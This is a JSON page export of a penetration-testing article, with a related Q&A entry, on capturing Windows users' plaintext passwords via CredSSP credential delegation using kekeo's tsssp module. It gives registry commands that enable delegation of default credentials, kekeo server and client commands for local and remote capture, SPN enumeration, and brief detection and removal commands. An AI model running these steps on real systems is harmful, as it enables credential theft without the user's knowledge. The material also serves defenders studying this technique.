[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f_lQDd959GuaQq4VDFmrN93jUlfFAGtt7mgyJ5RADYVs":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":52,"createdAt":52,"_status":51},697,"How can an attacker implement this CredSSP attack in a workgroup environment?","In a workgroup environment where NTLM authentication is used, the attacker first modifies the local Group Policy via registry commands to enable 'Allow delegating default credentials with NTLM-only server authentication'. Then, using regular user privileges, they run `tsssp::server` in kekeo to listen for connections, and `tsssp::client \u002Ftarget:anyword` to trigger the local client to send credentials over a named pipe. This allows capturing the current user's plaintext password without admin rights. The full command details are in the [original article](\u002Fnews\u002Fpenetration-technique-extracting-user-plaintext-passwords-via-credssp).","\u003Cp>In a workgroup environment where NTLM authentication is used, the attacker first modifies the local Group Policy via registry commands to enable &#39;Allow delegating default credentials with NTLM-only server authentication&#39;. Then, using regular user privileges, they run `tsssp::server` in kekeo to listen for connections, and `tsssp::client \u002Ftarget:anyword` to trigger the local client to send credentials over a named pipe. This allows capturing the current user&#39;s plaintext password without admin rights. The full command details are in the [original article](\u002Fnews\u002Fpenetration-technique-extracting-user-plaintext-passwords-via-credssp).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fpenetration-technique-extracting-user-plaintext-passwords-via-credssp\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-an-attacker-implement-this-credssp-attack-in-a-workgroup-environment-1777482464650","workgroup, NTLM, kekeo, tsssp, local credential capture",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":48,"updatedAt":49,"createdAt":50,"_status":51},173,"Penetration Technique - Extracting User Plaintext Passwords via CredSSP","penetration-technique-extracting-user-plaintext-passwords-via-credssp","Learn how to extract plaintext Windows user passwords via CredSSP Group Policy exploit without lsass process manipulation. Includes principles, exploitation methods, and defense tips.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In penetration testing, to obtain user passwords within Windows systems, the common approach is to read the memory of the lsass process. This method not only requires obtaining administrator privileges on the system but also, in many cases, necessitates bypassing the system's protection mechanisms for the lsass process.\u003C\u002Fp>\u003Cp>In my previous article 'Windows Password Hashes - Introduction to Net-NTLMv1', I introduced a method using InternalMonologue to obtain current user credentials (by making local procedure calls to the NTLM authentication package (MSV1_0) via SSPI to compute NetNTLM responses), which does not require manipulating the lsass process.\u003C\u002Fp>\u003Cp>This article will introduce another method to obtain the current user's password, which also does not require manipulating the lsass process.\u003C\u002Fp>\u003Cp>This is a feature added to the open-source tool kekeo by Benjamin @gentilkiwi Delpy in 2018. By simply modifying the Windows system's Group Policy, it is possible to obtain a user's plaintext password with standard user privileges.\u003C\u002Fp>\u003Cp>This article will briefly introduce its underlying principles, analyze exploitation approaches in different environments, and provide defense recommendations.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Implementation Principles\u003C\u002Fli>\u003Cli>Implementation Methods\u003C\u002Fli>\u003Cli>Exploitation Analysis\u003C\u002Fli>\u003Cli>Defense and Detection\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Implementation Principle\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Basic Knowledge\u003C\u002Fh3>\u003Ch4>CredSSP\u003C\u002Fh4>\u003Cp>Full name: Credential Security Support Provider protocol\u003C\u002Fp>\u003Cp>The purpose of the CredSSP protocol is to delegate the user's plaintext password from the CredSSP client to the CredSSP server\u003C\u002Fp>\u003Cp>CredSSP is commonly used in Remote Desktop Services (Remote Desktop Protocol) and Windows Remote Management (e.g., PowerShell Remoting)\u003C\u002Fp>\u003Cp>CredSSP provides an encrypted Transport Layer Security protocol channel. The negotiation protocol uses Kerberos and NTLM\u003C\u002Fp>\u003Cp>Reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows\u002Fwin32\u002Fsecauthn\u002Fcredential-security-support-provider\u003C\u002Fp>\u003Ch3>2. Configuring CredSSP Credential Delegation via Group Policy\u003C\u002Fh3>\u003Cp>Group Policy can specify whether applications using the CredSSP component send default credentials\u003C\u002Fp>\u003Cp>Group Policy location: Computer Configuration-&gt;Administrative Templates-&gt;System-&gt;Credentials Delegation\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017317112_0_f70fc960ad.png\">\u003C\u002Fp>\u003Cp>Allow delegating default credentials indicates automatically sending the current user's credentials when server authentication is achieved using a trusted X509 certificate or Kerberos.\u003C\u002Fp>\u003Cp>Allow delegating default credentials with NTLM-only server authentication indicates automatically sending the current user's credentials when server authentication is achieved using NTLM.\u003C\u002Fp>\u003Cp>Group Policy corresponding registry location: HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CredentialsDelegation\u003C\u002Fp>\u003Ch3>3. Application of CredSSP credential delegation on Remote Desktop Services\u003C\u002Fh3>\u003Cp>For workgroup environments, enable Allow delegating default credentials with NTLM-only server authentication.\u003C\u002Fp>\u003Cp>For domain environments, enable Allow delegating default credentials.\u003C\u002Fp>\u003Cp>After enabling the corresponding Group Policy, when using Remote Desktop Connection, the current user's credentials will be automatically sent (in plaintext format, not hash).\u003C\u002Fp>\u003Cp>Data structure is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>TSPasswordCreds ::= SEQUENCE {\u003Cbr>         domainName  [0] OCTET STRING,\u003Cbr>         userName    [1] OCTET STRING,\u003Cbr>         password    [2] OCTET STRING\u003Cbr> }\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-cssp\u002F17773cc4-21e9-4a75-a0dd-72706b174fe5\u003C\u002Fp>\u003Ch3>4. Implementation Principle\u003C\u002Fh3>\u003Cp>In summary, if we implement the following operations:\u003C\u002Fp>\u003Cul>\u003Cli>Modify the Group Policy on Host A to automatically send the current user's credentials\u003C\u002Fli>\u003Cli>Implement server functionality on Host B to receive requests sent from Host A\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Then when we control Host A to connect to Host B, Host B can obtain the plaintext password of Host A's user\u003C\u002Fp>\u003Cp>For details on the CredSSP protocol, refer to:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-cssp\u002F85f57821-40bb-46aa-bfcb-ba9590b8fc30\u003C\u002Fp>\u003Cp>Furthermore, if we implement the following operations:\u003C\u002Fp>\u003Cul>\u003Cli>Modify the Group Policy on Host A to automatically send the current user's credentials\u003C\u002Fli>\u003Cli>Implement server functionality on Host A to receive requests sent by Host A itself\u003C\u002Fli>\u003C\u002Ful>\u003Cp>We can also obtain the user's plaintext password\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Keko's implementation method is by creating a named pipe via the SMB protocol, not the RDP protocol\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017361867_1_3a88fdf11e.png\">\u003C\u002Fp>\u003Ch2>0x03 Implementation Method\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Add group policy by modifying the registry, commands are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\CredentialsDelegation \u002Fv AllowDefaultCredentials \u002Ft REG_DWORD \u002Fd 1\u003Cbr>reg add hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\CredentialsDelegation \u002Fv AllowDefCredentialsWhenNTLMOnly \u002Ft REG_DWORD \u002Fd 1\u003Cbr>reg add hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\CredentialsDelegation \u002Fv ConcatenateDefaults_AllowDefault \u002Ft REG_DWORD \u002Fd 1\u003Cbr>reg add hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\CredentialsDelegation \u002Fv ConcatenateDefaults_AllowDefNTLMOnly \u002Ft REG_DWORD \u002Fd 1\u003Cbr>reg add hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\CredentialsDelegation\\AllowDefaultCredentials \u002Fv 1 \u002Ft REG_SZ \u002Fd *\u003Cbr>reg add hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\CredentialsDelegation\\AllowDefCredentialsWhenNTLMOnly \u002Fv 1 \u002Ft REG_SZ \u002Fd *\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After adding group policy, it will take effect only after the user logs in again and enters credentials, such as locking the screen, logging off, or restarting.\u003C\u002Fp>\u003Cp>Implementation methods vary for different network environments.\u003C\u002Fp>\u003Ch3>1. Workgroup Network\u003C\u002Fh3>\u003Cp>Authentication method is NTLM\u003C\u002Fp>\u003Ch4>(1) Capture local passwords\u003C\u002Fh4>\u003Cp>The command to establish a server using kekeo is as follows (with regular user permissions):\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>tsssp::server\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The command to connect to the server is as follows (with regular user privileges):\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>tsssp::client \u002Ftarget:anyword\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017391946_2_c035ceb9d3.png\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>When capturing local passwords, the target parameter can be set to any character\u003C\u002Fp>\u003Ch3>2. Domain Network\u003C\u002Fh3>\u003Cp>The authentication method is Kerberos\u003C\u002Fp>\u003Ch4>(1) Capturing Local Passwords\u003C\u002Fh4>\u003Cp>The command to establish the server is as follows (with regular user privileges):\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>tsssp::server\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The command to connect to the server is as follows (with regular user privileges):\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>tsssp::client \u002Ftarget:anyword\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>When capturing local machine passwords, the target parameter can be set to any character\u003C\u002Fp>\u003Ch4>(2) Capturing remote host passwords\u003C\u002Fh4>\u003Cp>The kekeo command to establish a server is as follows (System privileges):\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>tsssp::server\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The kekeo command to connect to the server is as follows (regular user privileges):\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>tsssp::client \u002Ftarget:TERMSRV\u002FCOMPUTER01.test.com \u002Fpipe:\\\\COMPUTER01.test.com\\pipe\\kekeo_tsssp_endpoint\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The result is shown in the following figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017430836_3_5ea267812f.png\">\u003C\u002Fp>\u003Cp>The parameter used here corresponds to the SPN of the domain computer account\u003C\u002Fp>\u003Cp>To view all SPNs in the current domain, use the setspn command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>setspn.exe -q *\u002F*\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>To view all SPNs in the test domain:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>setspn.exe -T test -q *\u002F*\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x04 Exploitation Analysis\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Advantages\u003C\u002Fh3>\u003Cp>Does not require interaction with the lsass process, thus bypassing protections on the lsass process\u003C\u002Fp>\u003Cp>After modifying group policies, only standard user privileges are needed to achieve this\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>After adding group policies, it requires waiting for the user to log back in and enter credentials to take effect, such as locking the screen, logging off, or restarting\u003C\u002Fp>\u003Ch3>2. Other exploitation ideas\u003C\u002Fh3>\u003Ch4>(1) Code extraction\u003C\u002Fh4>\u003Cp>I extracted the tsssp::client functionality from kekeo separately, the address is as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>The code supports connecting to local and remote servers\u003C\u002Fp>\u003Cp>Only the pipi parameter needs to be filled in; my code will automatically complete the target parameter as TERMSRV\u002F\u003Cspn>\u003C\u002Fspn>\u003C\u002Fp>\u003Cp>Example command for connecting locally:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>tsssp_client.exe localhost\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Test as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017465831_4_fa5e2444aa.png\">\u003C\u002Fp>\u003Cp>Example command to connect to a remote server:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>tsssp_client.exe Computer01.test.com\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Test as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017481065_5_7384e27fa9.png\">\u003C\u002Fp>\u003Cp>The tsssp::server feature of kekeo requires installation of OSS ASN.1\u002FC\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Executable files compiled with the trial version of OSS ASN.1\u002FC cannot be used on systems without OSS ASN.1\u002FC installed\u003C\u002Fp>\u003Ch4>(2) Capturing other users' passwords\u003C\u002Fh4>\u003Cp>Start kekeo.exe or tsssp_client.exe using another user's token\u003C\u002Fp>\u003Cp>For token exploitation methods, refer to 'Penetration Techniques – Token Theft and Exploitation'\u003C\u002Fp>\u003Ch2>0x05 Defense and Detection\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>1. Query Group Policy configuration\u003C\u002Fp>\u003Cp>The cmd command to query the registry is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg query hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\CredentialsDelegation\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>2. Delete Group Policy Configuration\u003C\u002Fp>\u003Cp>The cmd command to delete registry entries is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg delete hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\CredentialsDelegation \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the exploitation methods of kekeo's tsssp module in different environments, providing defense recommendations based on the exploitation approach.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In penetration testing, to obtain user passwords within Windows systems, the common approach is to read the memory of the lsass process. This method not only requires obtaining administrator privileges on the system but also, in many cases, necessitates bypassing the system's protection mechanisms for the lsass process.\u003C\u002Fp>\u003Cp>In my previous article 'Windows Password Hashes - Introduction to Net-NTLMv1', I introduced a method using InternalMonologue to obtain current user credentials (by making local procedure calls to the NTLM authentication package (MSV1_0) via SSPI to compute NetNTLM responses), which does not require manipulating the lsass process.\u003C\u002Fp>\u003Cp>This article will introduce another method to obtain the current user's password, which also does not require manipulating the lsass process.\u003C\u002Fp>\u003Cp>This is a feature added to the open-source tool kekeo by Benjamin @gentilkiwi Delpy in 2018. By simply modifying the Windows system's Group Policy, it is possible to obtain a user's plaintext password with standard user privileges.\u003C\u002Fp>\u003Cp>This article will briefly introduce its underlying principles, analyze exploitation approaches in different environments, and provide defense recommendations.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Implementation Principles\u003C\u002Fli>\u003Cli>Implementation Methods\u003C\u002Fli>\u003Cli>Exploitation Analysis\u003C\u002Fli>\u003Cli>Defense and Detection\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Implementation Principle\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Basic Knowledge\u003C\u002Fh3>\u003Ch4>CredSSP\u003C\u002Fh4>\u003Cp>Full name: Credential Security Support Provider protocol\u003C\u002Fp>\u003Cp>The purpose of the CredSSP protocol is to delegate the user's plaintext password from the CredSSP client to the CredSSP server\u003C\u002Fp>\u003Cp>CredSSP is commonly used in Remote Desktop Services (Remote Desktop Protocol) and Windows Remote Management (e.g., PowerShell Remoting)\u003C\u002Fp>\u003Cp>CredSSP provides an encrypted Transport Layer Security protocol channel. The negotiation protocol uses Kerberos and NTLM\u003C\u002Fp>\u003Cp>Reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows\u002Fwin32\u002Fsecauthn\u002Fcredential-security-support-provider\u003C\u002Fp>\u003Ch3>2. Configuring CredSSP Credential Delegation via Group Policy\u003C\u002Fh3>\u003Cp>Group Policy can specify whether applications using the CredSSP component send default credentials\u003C\u002Fp>\u003Cp>Group Policy location: Computer Configuration-&gt;Administrative Templates-&gt;System-&gt;Credentials Delegation\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017317112_0_f70fc960ad-1.png\">\u003C\u002Fp>\u003Cp>Allow delegating default credentials indicates automatically sending the current user's credentials when server authentication is achieved using a trusted X509 certificate or Kerberos.\u003C\u002Fp>\u003Cp>Allow delegating default credentials with NTLM-only server authentication indicates automatically sending the current user's credentials when server authentication is achieved using NTLM.\u003C\u002Fp>\u003Cp>Group Policy corresponding registry location: HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CredentialsDelegation\u003C\u002Fp>\u003Ch3>3. Application of CredSSP credential delegation on Remote Desktop Services\u003C\u002Fh3>\u003Cp>For workgroup environments, enable Allow delegating default credentials with NTLM-only server authentication.\u003C\u002Fp>\u003Cp>For domain environments, enable Allow delegating default credentials.\u003C\u002Fp>\u003Cp>After enabling the corresponding Group Policy, when using Remote Desktop Connection, the current user's credentials will be automatically sent (in plaintext format, not hash).\u003C\u002Fp>\u003Cp>Data structure is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>TSPasswordCreds ::= SEQUENCE {\u003Cbr>         domainName  [0] OCTET STRING,\u003Cbr>         userName    [1] OCTET STRING,\u003Cbr>         password    [2] OCTET STRING\u003Cbr> }\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-cssp\u002F17773cc4-21e9-4a75-a0dd-72706b174fe5\u003C\u002Fp>\u003Ch3>4. Implementation Principle\u003C\u002Fh3>\u003Cp>In summary, if we implement the following operations:\u003C\u002Fp>\u003Cul>\u003Cli>Modify the Group Policy on Host A to automatically send the current user's credentials\u003C\u002Fli>\u003Cli>Implement server functionality on Host B to receive requests sent from Host A\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Then when we control Host A to connect to Host B, Host B can obtain the plaintext password of Host A's user\u003C\u002Fp>\u003Cp>For details on the CredSSP protocol, refer to:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-cssp\u002F85f57821-40bb-46aa-bfcb-ba9590b8fc30\u003C\u002Fp>\u003Cp>Furthermore, if we implement the following operations:\u003C\u002Fp>\u003Cul>\u003Cli>Modify the Group Policy on Host A to automatically send the current user's credentials\u003C\u002Fli>\u003Cli>Implement server functionality on Host A to receive requests sent by Host A itself\u003C\u002Fli>\u003C\u002Ful>\u003Cp>We can also obtain the user's plaintext password\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Keko's implementation method is by creating a named pipe via the SMB protocol, not the RDP protocol\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017361867_1_3a88fdf11e-1.png\">\u003C\u002Fp>\u003Ch2>0x03 Implementation Method\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Add group policy by modifying the registry, commands are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\CredentialsDelegation \u002Fv AllowDefaultCredentials \u002Ft REG_DWORD \u002Fd 1\u003Cbr>reg add hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\CredentialsDelegation \u002Fv AllowDefCredentialsWhenNTLMOnly \u002Ft REG_DWORD \u002Fd 1\u003Cbr>reg add hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\CredentialsDelegation \u002Fv ConcatenateDefaults_AllowDefault \u002Ft REG_DWORD \u002Fd 1\u003Cbr>reg add hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\CredentialsDelegation \u002Fv ConcatenateDefaults_AllowDefNTLMOnly \u002Ft REG_DWORD \u002Fd 1\u003Cbr>reg add hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\CredentialsDelegation\\AllowDefaultCredentials \u002Fv 1 \u002Ft REG_SZ \u002Fd *\u003Cbr>reg add hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\CredentialsDelegation\\AllowDefCredentialsWhenNTLMOnly \u002Fv 1 \u002Ft REG_SZ \u002Fd *\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After adding group policy, it will take effect only after the user logs in again and enters credentials, such as locking the screen, logging off, or restarting.\u003C\u002Fp>\u003Cp>Implementation methods vary for different network environments.\u003C\u002Fp>\u003Ch3>1. Workgroup Network\u003C\u002Fh3>\u003Cp>Authentication method is NTLM\u003C\u002Fp>\u003Ch4>(1) Capture local passwords\u003C\u002Fh4>\u003Cp>The command to establish a server using kekeo is as follows (with regular user permissions):\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>tsssp::server\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The command to connect to the server is as follows (with regular user privileges):\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>tsssp::client \u002Ftarget:anyword\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017391946_2_c035ceb9d3-1.png\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>When capturing local passwords, the target parameter can be set to any character\u003C\u002Fp>\u003Ch3>2. Domain Network\u003C\u002Fh3>\u003Cp>The authentication method is Kerberos\u003C\u002Fp>\u003Ch4>(1) Capturing Local Passwords\u003C\u002Fh4>\u003Cp>The command to establish the server is as follows (with regular user privileges):\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>tsssp::server\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The command to connect to the server is as follows (with regular user privileges):\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>tsssp::client \u002Ftarget:anyword\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>When capturing local machine passwords, the target parameter can be set to any character\u003C\u002Fp>\u003Ch4>(2) Capturing remote host passwords\u003C\u002Fh4>\u003Cp>The kekeo command to establish a server is as follows (System privileges):\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>tsssp::server\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The kekeo command to connect to the server is as follows (regular user privileges):\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>tsssp::client \u002Ftarget:TERMSRV\u002FCOMPUTER01.test.com \u002Fpipe:\\\\COMPUTER01.test.com\\pipe\\kekeo_tsssp_endpoint\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The result is shown in the following figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017430836_3_5ea267812f-1.png\">\u003C\u002Fp>\u003Cp>The parameter used here corresponds to the SPN of the domain computer account\u003C\u002Fp>\u003Cp>To view all SPNs in the current domain, use the setspn command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>setspn.exe -q *\u002F*\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>To view all SPNs in the test domain:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>setspn.exe -T test -q *\u002F*\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x04 Exploitation Analysis\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Advantages\u003C\u002Fh3>\u003Cp>Does not require interaction with the lsass process, thus bypassing protections on the lsass process\u003C\u002Fp>\u003Cp>After modifying group policies, only standard user privileges are needed to achieve this\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>After adding group policies, it requires waiting for the user to log back in and enter credentials to take effect, such as locking the screen, logging off, or restarting\u003C\u002Fp>\u003Ch3>2. Other exploitation ideas\u003C\u002Fh3>\u003Ch4>(1) Code extraction\u003C\u002Fh4>\u003Cp>I extracted the tsssp::client functionality from kekeo separately, the address is as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>The code supports connecting to local and remote servers\u003C\u002Fp>\u003Cp>Only the pipi parameter needs to be filled in; my code will 